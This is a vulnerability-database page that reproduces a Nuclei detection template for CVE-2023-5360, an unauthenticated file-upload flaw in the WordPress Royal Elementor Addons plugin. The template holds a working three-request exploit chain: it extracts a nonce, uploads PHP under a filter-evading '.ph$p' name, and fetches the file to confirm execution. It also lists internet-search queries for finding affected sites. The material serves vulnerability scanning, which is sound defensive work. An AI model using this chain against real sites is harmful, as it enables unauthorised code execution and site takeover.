Lucene search

K

WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload

🗓️ 17 Oct 2023 09:45:00Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 318 Views

WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload vulnerability fixed in 1.3.7

Show more
Related
Refs
Code
id: CVE-2023-5360

info:
  name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79
  remediation: Fixed in 1.3.79
  reference:
    - https://wordpress.org/plugins/royal-elementor-addons/
    - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5360
    - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34
    - http://packetstormsecurity.com/files/175992/WordPress-Royal-Elementor-Addons-And-Templates-Remote-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5360
    cwe-id: CWE-434
    epss-score: 0.96512
    epss-percentile: 0.99596
    cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 3
    vendor: royal-elementor-addons
    product: royal_elementor_addons
    framework: wordpress
    shodan-query: http.html:/plugins/royal-elementor-addons/
    fofa-query: body=/plugins/royal-elementor-addons/
    publicwww-query: "/plugins/royal-elementor-addons/"
  tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
variables:
  file: "{{to_lower(rand_text_alpha(5))}}"
  string: "CVE-2023-5360"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236

        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
        Content-Type: image/png

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="allowed_file_types"

        ph$p
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="triggering_event"

        click
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="wpr_addons_nonce"

        {{nonce}}
        -----------------------------318949277012917151102295043236--
      - |
        GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
        internal: true

      - type: regex
        name: filename
        part: body_2
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php'
        internal: true
# digest: 4a0a0047304502207026345615de71c3a227e64788ecc24047b81c29deb98710c628c5bbba56bb46022100ba470a1ce76efc6758529b7bdc408a5135e67d3a2b743853f723db43a3918c31:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Oct 2023 09:00Current
9.5High risk
Vulners AI Score9.5
CVSS39.8
EPSS0.782
318
.json
Report